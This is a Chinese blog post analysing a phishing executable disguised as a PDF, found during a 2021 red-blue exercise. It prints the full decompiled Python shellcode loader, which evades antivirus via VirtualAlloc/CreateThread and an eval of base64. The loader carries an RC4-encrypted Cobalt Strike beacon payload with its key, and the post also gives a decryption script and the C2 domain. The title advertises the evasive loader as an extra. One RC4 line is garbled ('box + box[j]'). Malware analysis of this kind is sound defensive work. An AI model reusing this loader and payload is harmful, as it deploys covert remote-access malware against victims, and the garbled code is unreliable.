2021HW-样本分析(附免杀shellcode加载器)

  • A+
所属分类:逆向工程

2021HW-样本分析(附免杀shellcode加载器)

0x01 邮件原文与样本


hw期间内部邮箱网关收到了钓鱼邮件


邮件原文如下


2021HW-样本分析(附免杀shellcode加载器)


2021HW-样本分析(附免杀shellcode加载器)


解压后得到样本

财险内部旅游套餐方案.pdf.exe

样本为大小为5.88M,HASH如下

MD5

5bc32973b43593207626c0588fc6247e

SHA-1

551414cb283a56cf55817c720c2efee0144ea2ed

SHA-256

d12e852eeefa87e75c7876fb53947b979bfbf880eb825eb58b9fe7f0132809ad

VT报毒 14/69,免杀效果尚可


2021HW-样本分析(附免杀shellcode加载器)


2021HW-样本分析(附免杀shellcode加载器)


通过Yara规则检测,为典型的Cobaltstrike x64 https beacon载荷


2021HW-样本分析(附免杀shellcode加载器)


基于程序体积和逆向后获取到的函数判断,该恶意样本为Python编写的shellcodeloader来加载CS https beacon X64 shellcode,后用py2exe程序进行封装。


2021HW-样本分析(附免杀shellcode加载器)


对该程序进行逆向unpy2exe逆向分析,取得其源码

# uncompyle6 version 3.7.4
# Python bytecode 3.7
# Decompiled from: Python 3.7.9 (tags/v3.7.9:13c94747c7, Aug 17 2020, 18:58:18) [MSC v.1900 64 bit (AMD64)]
# Embedded file name: py36test.py

import ctypes, urllib, base64, requests, hashlib

def shellCodeLoad(shellcode):
  ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64
  ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(12288), ctypes.c_int(64))
  buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode)
  eval(base64.b64decode('Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTWVtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=='))
  handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_uint64(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0)))
  ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle), ctypes.c_int(-1))

def rc4(text, key):
  key = hashlib.md5(key).hexdigest()
  text = base64.b64decode(text)
  result = ''
  key_len = len(key)
  box = list(range(256))
  j = 0
  for i in range(256):
     j = (j + box[i] + ord(key[(i % key_len)])) % 256
     box[i], box[j] = box[j], box[i]
  i = j = 0

  for element in text:
     i = (i + 1) % 256
     j = (j + box[i]) % 256
     box[i], box[j] = box[j], box[i]
     k = chr(element ^ box[((box + box[j]) % 256)])
     result += k
  return result

if __name__ == '__main__':
  b = '24LfU140d71x8NG78Y79RFNXRJanRORJMeYHYusdrdthA5ze2q9sx7gEZUtrpysR9EkzxP5sNbhA9sHY2QCJ014rV3Ynumbfg1mGe87M/kmlAbd93FC0v13PI+mBOiDE5Plt9wqib1srOudHMS6PY79V14jwaF5RTo5Q76FcuYAg5vWyjU4wmquSknlf3DaN0/YpOuCn+qLiP8AlCYyy1j/8WzgVW87NdyzEO2HP5HZWfi0BiRXk8qopN8qMZjmltuE/FfgSza412HwM6d5vU7wuki4R5w3e2dzBSCQ6HSmSXc/rjKPLwkXhnKblzauanHQQUprU43eJ6A3FMLPyBwUUmXiE84r0pD0sR/YNBpI+xpayWRa/3hnWWaYAZNhZ5I82v2gUK1P0IQyXyLBHjGQejFptrZQE+5t2mJgOaIv+kgilCdHR7UsIyS3CDLlzX/241f6fmTUCTXon68Gey0bx3BYdMjIwpdCqxBBqJxyFNNqNhPYgQGWUZ1/GcGK4IN3+zFbS/Q+X8QQW2n9+r/lW/BAFF9bZbQTGPtt9GPfQNRObgy+ucbRkS/Ln+TZpxTtzW8pPmUdMtW1/tq1BHsnexwnRzyJeTEbTTOyvxj+uG0KGLfXMX9UbAnNHkNyhs/uPEKvB7Wv98FHmS8F0fokZQCBrv4xwE1b0fsBiq51t+i8ls+dfTyhdAC9tkkQS1j5HnSXiF4SP/ew3dISqoLp6gds6r+XhT1aLMQXmlnx8f7s+eUw9pydXiG5VmBjV8d/2AGsMuh7ZLTssXi5bgSL/U5S9D/dYt2U0O3O+UhmUE78PPn5aHX+ogmuXesn5AfnItZ7F66/cneKwcsdnUqKtWiW0SVHd75QTU+bnlIEgCE9iTqy2MZDPCeqGawxz28H3RGnCivK/48+7jPHEgNMmV7X5FFtnCSnuwDhyDSr6aIT82Ct8k7hoDuOSaPl00gTI2tT5NlhOt+4xepya0zyK/Os3R+P0tobg0hiSt6PhC6RiphkzC8mt+1a1ATqLnIoC7aw0I/eGDacgBXUwhSDNOK52fq3GnUZoTBOfWdHXs67qF2tQ2qEipNcI29gict6kZIwgwut6sK8F5R+njGdtUxeidh9g7tphQYOifvFzzQ5p78h2HSB6g/yETLZksR7xIOKYKILm5IkaU0jM+qI9IKh9+gjJXBcHPtGgmzDzFLdM2ObDr2vDFRDVylXVfUaGnZ4KmCN4Sn60WRSgH2SMjbL11wKPQ3H0dDZ7AsIDgskmaZa1f/02JYdiVAJF2379mpEQa/M89YpDEBVzlJRb8ikw3ON9PnH3zw4cvvs3uLjpfrV3zi5CPgCIa9u0DlE8aEsuLtFPszJA/Q+pQJTgHk1mt33MpQzDo/zCRAsCQ7/SjCa8ETECbvXrrOrC6gsEBrmTeRGzGOS2fxsxc2FB585NZXKHNWrwg6IS4myDWjTKUMy9GWyy8zd9hxvXyzNLKfZANZ2wnlSgpzYVb8Aj8Ln6cxCk+VKXh7zWc7JA+mD6GT2d9Y/n3a1RKgEYi/gtpwAPAWxhCiZsBeqfgtX9MFtv8AR/YU3g8VwRLswsJUo8iHwx9/RHtUGvkczLnphkQpJmuyVHb+stPkZc82wiUw63SX8va2mAnHcoOVW1di9HLQHwxKHKVPQ='
  mm = 'king6666'
  c = rc4(b, mm.encode('utf-8'))
  code = bytearray(base64.b64decode(c))
  shellCodeLoad(code)

分析得出该恶意样本是通过rc4算法解密base64加密的shellcode

并且使用VirtualAlloc开辟内存空间放入内存中执行

编写解密脚本

import ctypes, urllib, base64, requests, hashlib

def rc4(text, key):
  key = hashlib.md5(key).hexdigest()
  text = base64.b64decode(text)
  result = ''
  key_len = len(key)
  box = list(range(256))
  j = 0
  for i in range(256):
     j = (j + box[i] + ord(key[(i % key_len)])) % 256
     box[i], box[j] = box[j], box[i]
  i = j = 0
  for element in text:
     i = (i + 1) % 256
     j = (j + box[i]) % 256
     box[i], box[j] = box[j], box[i]
     k = chr(element ^ box[((box + box[j]) % 256)])
     result += k
  return result

b = '24LfU140d71x8NG78Y79RFNXRJanRORJMeYHYusdrdthA5ze2q9sx7gEZUtrpysR9EkzxP5sNbhA9sHY2QCJ014rV3Ynumbfg1mGe87M/kmlAbd93FC0v13PI+mBOiDE5Plt9wqib1srOudHMS6PY79V14jwaF5RTo5Q76FcuYAg5vWyjU4wmquSknlf3DaN0/YpOuCn+qLiP8AlCYyy1j/8WzgVW87NdyzEO2HP5HZWfi0BiRXk8qopN8qMZjmltuE/FfgSza412HwM6d5vU7wuki4R5w3e2dzBSCQ6HSmSXc/rjKPLwkXhnKblzauanHQQUprU43eJ6A3FMLPyBwUUmXiE84r0pD0sR/YNBpI+xpayWRa/3hnWWaYAZNhZ5I82v2gUK1P0IQyXyLBHjGQejFptrZQE+5t2mJgOaIv+kgilCdHR7UsIyS3CDLlzX/241f6fmTUCTXon68Gey0bx3BYdMjIwpdCqxBBqJxyFNNqNhPYgQGWUZ1/GcGK4IN3+zFbS/Q+X8QQW2n9+r/lW/BAFF9bZbQTGPtt9GPfQNRObgy+ucbRkS/Ln+TZpxTtzW8pPmUdMtW1/tq1BHsnexwnRzyJeTEbTTOyvxj+uG0KGLfXMX9UbAnNHkNyhs/uPEKvB7Wv98FHmS8F0fokZQCBrv4xwE1b0fsBiq51t+i8ls+dfTyhdAC9tkkQS1j5HnSXiF4SP/ew3dISqoLp6gds6r+XhT1aLMQXmlnx8f7s+eUw9pydXiG5VmBjV8d/2AGsMuh7ZLTssXi5bgSL/U5S9D/dYt2U0O3O+UhmUE78PPn5aHX+ogmuXesn5AfnItZ7F66/cneKwcsdnUqKtWiW0SVHd75QTU+bnlIEgCE9iTqy2MZDPCeqGawxz28H3RGnCivK/48+7jPHEgNMmV7X5FFtnCSnuwDhyDSr6aIT82Ct8k7hoDuOSaPl00gTI2tT5NlhOt+4xepya0zyK/Os3R+P0tobg0hiSt6PhC6RiphkzC8mt+1a1ATqLnIoC7aw0I/eGDacgBXUwhSDNOK52fq3GnUZoTBOfWdHXs67qF2tQ2qEipNcI29gict6kZIwgwut6sK8F5R+njGdtUxeidh9g7tphQYOifvFzzQ5p78h2HSB6g/yETLZksR7xIOKYKILm5IkaU0jM+qI9IKh9+gjJXBcHPtGgmzDzFLdM2ObDr2vDFRDVylXVfUaGnZ4KmCN4Sn60WRSgH2SMjbL11wKPQ3H0dDZ7AsIDgskmaZa1f/02JYdiVAJF2379mpEQa/M89YpDEBVzlJRb8ikw3ON9PnH3zw4cvvs3uLjpfrV3zi5CPgCIa9u0DlE8aEsuLtFPszJA/Q+pQJTgHk1mt33MpQzDo/zCRAsCQ7/SjCa8ETECbvXrrOrC6gsEBrmTeRGzGOS2fxsxc2FB585NZXKHNWrwg6IS4myDWjTKUMy9GWyy8zd9hxvXyzNLKfZANZ2wnlSgpzYVb8Aj8Ln6cxCk+VKXh7zWc7JA+mD6GT2d9Y/n3a1RKgEYi/gtpwAPAWxhCiZsBeqfgtX9MFtv8AR/YU3g8VwRLswsJUo8iHwx9/RHtUGvkczLnphkQpJmuyVHb+stPkZc82wiUw63SX8va2mAnHcoOVW1di9HLQHwxKHKVPQ='
mm = 'king6666'
c = rc4(b, mm.encode('utf-8'))
code = bytearray(base64.b64decode(c))
print(code)

得到其shellcode


2021HW-样本分析(附免杀shellcode加载器)


回连地址为www.alibababaa.com


为典型的cobaltstrike https x64 beacon shellcode


至此,分析结束


2021HW-样本分析(附免杀shellcode加载器)

本文始发于微信公众号(疯猫网络):2021HW-样本分析(附免杀shellcode加载器)

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: